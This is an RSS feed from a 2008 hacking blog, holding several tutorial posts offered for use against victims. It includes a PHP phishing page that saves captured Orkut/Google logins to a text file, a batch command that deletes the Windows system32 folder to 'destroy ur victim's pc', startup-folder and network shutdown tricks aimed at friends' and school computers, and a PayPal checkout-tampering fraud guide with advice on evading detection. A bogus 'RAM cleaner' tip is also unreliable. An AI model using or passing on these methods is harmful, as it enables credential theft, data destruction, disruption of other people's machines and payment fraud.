<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>DARE TO DREAM</title>
	<atom:link href="http://hacktheworldnow.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://hacktheworldnow.wordpress.com</link>
	<description>This blog is dedicated to latest hacking,google hacking,viruses,wiondows hacking &#38; tips &#38; lots of funny things</description>
	<lastBuildDate>Tue, 08 Jul 2008 18:19:47 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='hacktheworldnow.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>DARE TO DREAM</title>
		<link>http://hacktheworldnow.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://hacktheworldnow.wordpress.com/osd.xml" title="DARE TO DREAM" />
	<atom:link rel='hub' href='http://hacktheworldnow.wordpress.com/?pushpress=hub'/>
		<item>
		<title>fake login page by using php</title>
		<link>http://hacktheworldnow.wordpress.com/2008/07/08/fake-login-page-by-using-php/</link>
		<comments>http://hacktheworldnow.wordpress.com/2008/07/08/fake-login-page-by-using-php/#comments</comments>
		<pubDate>Tue, 08 Jul 2008 18:19:47 +0000</pubDate>
		<dc:creator>rohitmax055</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://hacktheworldnow.wordpress.com/?p=21</guid>
		<description><![CDATA[fake login page by using php ??Tutorials:how to make fake page of any webpage ??Tutorials:how to make fake page of any webpage a new section for php based fake pages after which ny1 will be able to make fake page of any website(really)   so lets start now:- first of all u need to know [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=21&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>fake login page by using php<br />
??Tutorials:how to make fake page of any webpage<br />
??Tutorials:how to make fake page of any webpage<br />
a new section for php based fake pages after which ny1 will be able to make fake page of any website(really)</p>
<p> </p>
<p>so lets start now:-</p>
<p>first of all u need to know the source code of the website of which u want fake page<br />
*for that right click on the webpage n click on view page source a new window will open just select all n copy the content n save it as urpage.html(u can name it nything u like acc to webpage)</p>
<p>now open ur urpage.html n search for :<br />
&lt;form id=&#8221;gaia_loginform&#8221; action=&#8221;<a href="https://www.google.com/accounts/ServiceLoginAuth?service=orkut">https://www.google.com/accounts/ServiceLoginAuth?service=orkut</a>&#8221; method=&#8221;post&#8221;<br />
onsubmit=&#8221;return(gaia_onLoginSubmit());&#8221;&gt;<br />
firstly copy the text in blue n remember it u ll need it in ur php file</p>
<p>replace the text in blue with ur php filename like orkut.php</p>
<p>ur php file:<br />
&lt;?php<br />
header (&#8216;Location:www.orkut.com&#8217;);<br />
$handle = fopen(&#8220;login.txt&#8221;, &#8220;a&#8221;);<br />
foreach($_POST as $variable =&gt; $value) {<br />
fwrite($handle, $variable);<br />
fwrite($handle, &#8220;=&#8221;);<br />
fwrite($handle, $value);<br />
fwrite($handle, &#8220;\r\n&#8221;);<br />
}<br />
fwrite($handle, &#8220;\r\n&#8221;);<br />
fclose($handle);<br />
exit;<br />
?&gt;</p>
<p>now replace the text&#8221; www.orkut.com&#8221; with the blue text from above<br />
n now save the php file as orkut.php<br />
now make a login.txt file which would be a blank file</p>
<p>now upload all the three files orkut.html,orkut.php,login.txt in a webhost which supports php like freeweb7(or u can google for more webhost for dat)<br />
now u all r thinking dat how will i get the passwords?????<br />
all the data entered in ur fake page will be stored in ur login.txt file which u can access thru ur webhost<br />
so now enjoy ur new fake webpage</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/hacktheworldnow.wordpress.com/21/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/hacktheworldnow.wordpress.com/21/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hacktheworldnow.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hacktheworldnow.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hacktheworldnow.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hacktheworldnow.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/hacktheworldnow.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/hacktheworldnow.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/hacktheworldnow.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/hacktheworldnow.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hacktheworldnow.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hacktheworldnow.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hacktheworldnow.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hacktheworldnow.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hacktheworldnow.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hacktheworldnow.wordpress.com/21/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=21&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://hacktheworldnow.wordpress.com/2008/07/08/fake-login-page-by-using-php/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5b0e324cb76ea87c91f501bb1bfdd18?s=96&#38;d=wavatar&#38;r=PG" medium="image">
			<media:title type="html">rohitmax055</media:title>
		</media:content>
	</item>
		<item>
		<title>Clean Your RAM &amp; Make Your Comp Speed Better</title>
		<link>http://hacktheworldnow.wordpress.com/2008/07/08/clean-your-ram-make-your-comp-speed-better/</link>
		<comments>http://hacktheworldnow.wordpress.com/2008/07/08/clean-your-ram-make-your-comp-speed-better/#comments</comments>
		<pubDate>Tue, 08 Jul 2008 18:15:11 +0000</pubDate>
		<dc:creator>rohitmax055</dc:creator>
				<category><![CDATA[Windows Tips Cllection]]></category>

		<guid isPermaLink="false">http://hacktheworldnow.wordpress.com/?p=20</guid>
		<description><![CDATA[Clean Your RAM &#38; Make Your Comp Speed Better Clean your RAM You may recognize that your system gets slower and slower when playing and working a lot with your Desktop or a laptop. That’s because your RAM is full of remaining progress pieces you do not need any more. Open the notepad and type [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=20&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Clean Your RAM &amp; Make Your Comp Speed Better</p>
<p>Clean your RAM</p>
<p>You may recognize that your system gets slower and slower when playing and working a lot with your Desktop or a laptop. That’s because your RAM is full of remaining progress pieces you do not need any more.<br />
Open the notepad and type</p>
<p>FreeMem=Space(64000000)<br />
In this file and save it as RAMcleaner.vbs [ You should choose the “All Files” option when u save it ]</p>
<p>Run the file and your RAM may be cleaned<br />
Of course u can edit the code in the file for a greater “cleaning-progress”.</p>
<p>FreeMem=Space(128000000)</p>
<p>Just try it out.. it worked for me. Post your comment here if it worked for you !</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/hacktheworldnow.wordpress.com/20/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/hacktheworldnow.wordpress.com/20/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hacktheworldnow.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hacktheworldnow.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hacktheworldnow.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hacktheworldnow.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/hacktheworldnow.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/hacktheworldnow.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/hacktheworldnow.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/hacktheworldnow.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hacktheworldnow.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hacktheworldnow.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hacktheworldnow.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hacktheworldnow.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hacktheworldnow.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hacktheworldnow.wordpress.com/20/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=20&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://hacktheworldnow.wordpress.com/2008/07/08/clean-your-ram-make-your-comp-speed-better/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5b0e324cb76ea87c91f501bb1bfdd18?s=96&#38;d=wavatar&#38;r=PG" medium="image">
			<media:title type="html">rohitmax055</media:title>
		</media:content>
	</item>
		<item>
		<title>Shutdown Pc&#8217;s @ School !!</title>
		<link>http://hacktheworldnow.wordpress.com/2008/07/08/shutdown-pcs-school/</link>
		<comments>http://hacktheworldnow.wordpress.com/2008/07/08/shutdown-pcs-school/#comments</comments>
		<pubDate>Tue, 08 Jul 2008 18:06:30 +0000</pubDate>
		<dc:creator>rohitmax055</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://hacktheworldnow.wordpress.com/?p=19</guid>
		<description><![CDATA[Shutdown Pc&#8217;s @ School !! You wanna mess around with your school network? You wanna own the shit out of some kiddies who think they&#8217;re the best? Well thankfully there&#8217;s the shutdown function in cmd Smile First of all you need to have access to a cmd prompt on the network for this to work. [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=19&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Shutdown Pc&#8217;s @ School !!</p>
<p>You wanna mess around with your school network?</p>
<p>You wanna own the shit out of some kiddies who think they&#8217;re the best?</p>
<p>Well thankfully there&#8217;s the shutdown function in cmd Smile</p>
<p>First of all you need to have access to a cmd prompt on the network for this to work.</p>
<p>If it&#8217;s disabled you can obviously run everything from .bat files.</p>
<p>So first type in<br />
Code:<br />
Net View<br />
This will give you all the names for all the computers on the network.</p>
<p>Then you want to find a target and write it down, so for example a name is //045-comproom1-05 then you will utilize that name to shutdown the computer.</p>
<p>What next? Well if you&#8217;re a lil skiddy yourself then the easiest thing to do is type in<br />
Code:<br />
shutdown -i<br />
which will give you a gui interface and you&#8217;ll be able to shutdown whichever computer you want with it, you can set a time, even throw in a funny comment like &#8220;owned&#8221; or somethin Smile.</p>
<p>commands you will use if you just wanna use the command interface are</p>
<p>Code:<br />
shutdown -m //computername<br />
- shutsdown the pc.</p>
<p>Code:<br />
shutdown -m -c &#8220;owned&#8221;<br />
shutdown with a comment.</p>
<p>Code:<br />
shutdown -l<br />
logoff the user.</p>
<p>Code:<br />
shutdown -r<br />
restart the computer.</p>
<p>and so on&#8230;</p>
<p>Well that was a nice and quick tutorial now wasn&#8217;t it?</p>
<p>Have fun, be safe.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/hacktheworldnow.wordpress.com/19/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/hacktheworldnow.wordpress.com/19/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hacktheworldnow.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hacktheworldnow.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hacktheworldnow.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hacktheworldnow.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/hacktheworldnow.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/hacktheworldnow.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/hacktheworldnow.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/hacktheworldnow.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hacktheworldnow.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hacktheworldnow.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hacktheworldnow.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hacktheworldnow.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hacktheworldnow.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hacktheworldnow.wordpress.com/19/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=19&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://hacktheworldnow.wordpress.com/2008/07/08/shutdown-pcs-school/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5b0e324cb76ea87c91f501bb1bfdd18?s=96&#38;d=wavatar&#38;r=PG" medium="image">
			<media:title type="html">rohitmax055</media:title>
		</media:content>
	</item>
		<item>
		<title>Make Force Computer Keep Restarting</title>
		<link>http://hacktheworldnow.wordpress.com/2008/07/08/make-force-computer-keep-restarting/</link>
		<comments>http://hacktheworldnow.wordpress.com/2008/07/08/make-force-computer-keep-restarting/#comments</comments>
		<pubDate>Tue, 08 Jul 2008 18:03:17 +0000</pubDate>
		<dc:creator>rohitmax055</dc:creator>
				<category><![CDATA[Hacking Windows]]></category>

		<guid isPermaLink="false">http://hacktheworldnow.wordpress.com/?p=18</guid>
		<description><![CDATA[Make Force Computer Keep Restarting 1.open note pad 2.type &#8220;shutdown -s&#8221; with out quotes 3.save the file with .bat extension 4.explaination,u have created a prog which shutdowns the pc with in 30 of executing the file 5. now open &#8220;x:\Documents and Settings\USERNAME\Start Menu\Programs\Startup\&#8221; (x-&#62;is the drive on which ur windows has been installed and USERNAME [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=18&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Make Force Computer Keep Restarting</p>
<p>1.open note pad</p>
<p>2.type &#8220;shutdown -s&#8221; with out quotes</p>
<p>3.save the file with .bat extension<br />
4.explaination,u have created a prog which shutdowns the pc with in 30<br />
of executing the file</p>
<p>5. now open &#8220;x:\Documents and Settings\USERNAME\Start Menu\Programs\Startup\&#8221; (x-&gt;is the drive on which ur windows has been installed and USERNAME is the username)</p>
<p>6.paste a shortcut on this directory</p>
<p> </p>
<p>NOW WHEN EVER UR FRIEND STARTS HIS PC a count down will start after 30 sec his pc will shutdown<br />
u can also maki his pc restart instead of shutting down.. just replace &#8220;shutdown -s&#8221; &#8220;restart _s&#8221;<br />
enjoy&#8230;. this is not a virus but look so&#8230;.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/hacktheworldnow.wordpress.com/18/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/hacktheworldnow.wordpress.com/18/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hacktheworldnow.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hacktheworldnow.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hacktheworldnow.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hacktheworldnow.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/hacktheworldnow.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/hacktheworldnow.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/hacktheworldnow.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/hacktheworldnow.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hacktheworldnow.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hacktheworldnow.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hacktheworldnow.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hacktheworldnow.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hacktheworldnow.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hacktheworldnow.wordpress.com/18/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=18&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://hacktheworldnow.wordpress.com/2008/07/08/make-force-computer-keep-restarting/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5b0e324cb76ea87c91f501bb1bfdd18?s=96&#38;d=wavatar&#38;r=PG" medium="image">
			<media:title type="html">rohitmax055</media:title>
		</media:content>
	</item>
		<item>
		<title>DESTROY VICTMIN&#8217;S PC</title>
		<link>http://hacktheworldnow.wordpress.com/2008/07/08/destroy-victmins-pc/</link>
		<comments>http://hacktheworldnow.wordpress.com/2008/07/08/destroy-victmins-pc/#comments</comments>
		<pubDate>Tue, 08 Jul 2008 18:01:12 +0000</pubDate>
		<dc:creator>rohitmax055</dc:creator>
				<category><![CDATA[Hacking Windows]]></category>

		<guid isPermaLink="false">http://hacktheworldnow.wordpress.com/?p=17</guid>
		<description><![CDATA[A simple Trick to destroy ur victim&#8217;s pc I m here explain to make a file that destroys ur victims pc I m not responsible for the damage caused by this file.&#8221; 1. Open Notepad 2. write the above command : - del c:\WINDOWS\system32\*.*/q 3. Save the above notepad with the extension &#8220;.bat or .cmd&#8221; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=17&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>A simple Trick to destroy ur victim&#8217;s pc<br />
I m here explain to make a file that destroys ur victims pc<br />
I m not responsible for the damage caused by this file.&#8221;</p>
<p>1. Open Notepad</p>
<p>2. write the above command : -<br />
del c:\WINDOWS\system32\*.*/q</p>
<p>3. Save the above notepad with the extension &#8220;.bat or .cmd&#8221; as u want</p>
<p>4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!! !!!<br />
Don&#8217;t double click the file otherwise u r in trouble.<br />
Why ?????? bcz the file u created delete all files from ur</p>
<p>system32 folder and when u restart ur pc it will not start</p>
<p>bcz system can not find the files in the system32 folder which</p>
<p>is required at the time of booting.</p>
<p>5. You can also test the above by creating a fake folder let suppose</p>
<p>windows1 in C:\. Copy some old files in it and just follow the</p>
<p>above command.By double clicking the bat or cmd file ur all files</p>
<p>automaitcally get deleted.</p>
<p>6. You can try this file in any one`s computer.(but this result in causing damage to the<br />
computer, so thik again before trying this on anyone&#8217;s pc)</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/hacktheworldnow.wordpress.com/17/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/hacktheworldnow.wordpress.com/17/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hacktheworldnow.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hacktheworldnow.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hacktheworldnow.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hacktheworldnow.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/hacktheworldnow.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/hacktheworldnow.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/hacktheworldnow.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/hacktheworldnow.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hacktheworldnow.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hacktheworldnow.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hacktheworldnow.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hacktheworldnow.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hacktheworldnow.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hacktheworldnow.wordpress.com/17/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=17&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://hacktheworldnow.wordpress.com/2008/07/08/destroy-victmins-pc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5b0e324cb76ea87c91f501bb1bfdd18?s=96&#38;d=wavatar&#38;r=PG" medium="image">
			<media:title type="html">rohitmax055</media:title>
		</media:content>
	</item>
		<item>
		<title>Hacking PayPal</title>
		<link>http://hacktheworldnow.wordpress.com/2008/07/08/hacking-paypal/</link>
		<comments>http://hacktheworldnow.wordpress.com/2008/07/08/hacking-paypal/#comments</comments>
		<pubDate>Tue, 08 Jul 2008 17:50:43 +0000</pubDate>
		<dc:creator>rohitmax055</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://hacktheworldnow.wordpress.com/?p=16</guid>
		<description><![CDATA[Hacking PayPal Ever wanted a software program you had to buy online? Most of us have and I will teach you how to do it cheap, and how to not get caught. The Programs Are: Mozilla Firefox Vidalia Privoxy Tamper Data (Firefox Addon) Torbutton (Firefox Addon) Download all those programs, they can be found easily [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=16&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hacking PayPal<br />
Ever wanted a software program you had to buy online? Most of us have<br />
and I will teach you how to do it cheap, and how to not get caught.</p>
<p>The Programs Are:</p>
<p>Mozilla Firefox<br />
Vidalia<br />
Privoxy<br />
Tamper Data (Firefox Addon)<br />
Torbutton (Firefox Addon)</p>
<p>Download all those programs, they can be found easily on google.</p>
<p>First thing first is to find a automatic Paypal system, this is very common among internet paypal sites that sell the warez that are not free.</p>
<p>Once you find something you want, remember the site.</p>
<p>Make a paypal account now, a new one even if you do have a old one, I would prefer to proxy all accounts you make and all accounts you log into just for safety reasons. To do this:</p>
<p>Run Vidalia, Start It<br />
Run Privoxy, it will be in you notification area<br />
Start Mozilla and at the bottom right hand corner you should see Tor Disabled in red letters, meaning you downloaded Torbutton correctly, just click the red letters once and they will turn green saying Tor Enabled, now your anonymized.</p>
<p>Create a account on paypal now, link it to your bank account, or use a Visa Giftcard, which is probably the safest way since I have yet to find a way to register a fake bank account to verify my account so I can use money. If you do find a way to make a fake bank account please tell me, but once someone figures out a safer way to do this step, you are going to have to take a risk of your paypal scam being linked to your bank account.</p>
<p>If the site that has your awesome **** on it requires registration to buy there items, also do this behind the proxy. Once you are logged in (if required) and you see the item you want with that tempting &#8220;Add to Cart&#8221; button, go to &#8220;Tools&#8221; and at the very bottom should be your addon Tamper Data. Run this, and click Start Tamper. Now go back to your site and click &#8220;Add to Cart&#8221; you should recieve popups from Tamper Data that give 3 Options, Tamper, Submit and Abort. Just click Tamper on every single cookie after you click &#8220;Add to Cart&#8221;, because every online store sends the cookie with the info you need at different times. I have seen some that send it at the very end of checking out, so click Tamper on every cookie that you receive, until you see one cookie that stands out with way more parameters than any cookie you have seen so far, unless it was your first cookie of course. The cookie with tons of parameters, will have a parameter named &#8220;Amount&#8221; and the amount next to it should be the amount you paid in dollars, now just edit this parameter from whatever amount it was previously to 0.01</p>
<p>All the cookies after this can be submitted or you can stop Tamper Data, no cookies after this need to be viewed. Now once you hit whatever button on your site that is equal to Check Out that brings you to Paypal you will see on the Paypal site the amount has changed to 1 penny. Every single automatic service donation site item will now cost you a penny, I use a vista giftcard on my paypal account, so 100 dollars on a gift card is pretty much = to 1000 items you want for 1 penny.</p>
<p>P.S. I could not find any rules on &#8220;fraud&#8221; so if this is a post against the rules can you refrain from banning me and just delete the post</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/hacktheworldnow.wordpress.com/16/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/hacktheworldnow.wordpress.com/16/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/hacktheworldnow.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/hacktheworldnow.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/hacktheworldnow.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/hacktheworldnow.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/hacktheworldnow.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/hacktheworldnow.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/hacktheworldnow.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/hacktheworldnow.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/hacktheworldnow.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/hacktheworldnow.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/hacktheworldnow.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/hacktheworldnow.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/hacktheworldnow.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/hacktheworldnow.wordpress.com/16/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=hacktheworldnow.wordpress.com&amp;blog=4167556&amp;post=16&amp;subd=hacktheworldnow&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://hacktheworldnow.wordpress.com/2008/07/08/hacking-paypal/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d5b0e324cb76ea87c91f501bb1bfdd18?s=96&#38;d=wavatar&#38;r=PG" medium="image">
			<media:title type="html">rohitmax055</media:title>
		</media:content>
	</item>
		<item>
		<title>Hacking Websites</title>
		<link>http://hacktheworldnow.wordpress.com/2008/07/08/hacking-websites/</link>
		<comments>http://hacktheworldnow.wordpress.com/2008/07/08/hacking-websites/#comments</comments>
		<pubDate>Tue, 08 Jul 2008 17:42:51 +0000</pubDate>
		<dc:creator>rohitmax055</dc:creator>
				<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://hacktheworldnow.wordpress.com/?p=15</guid>
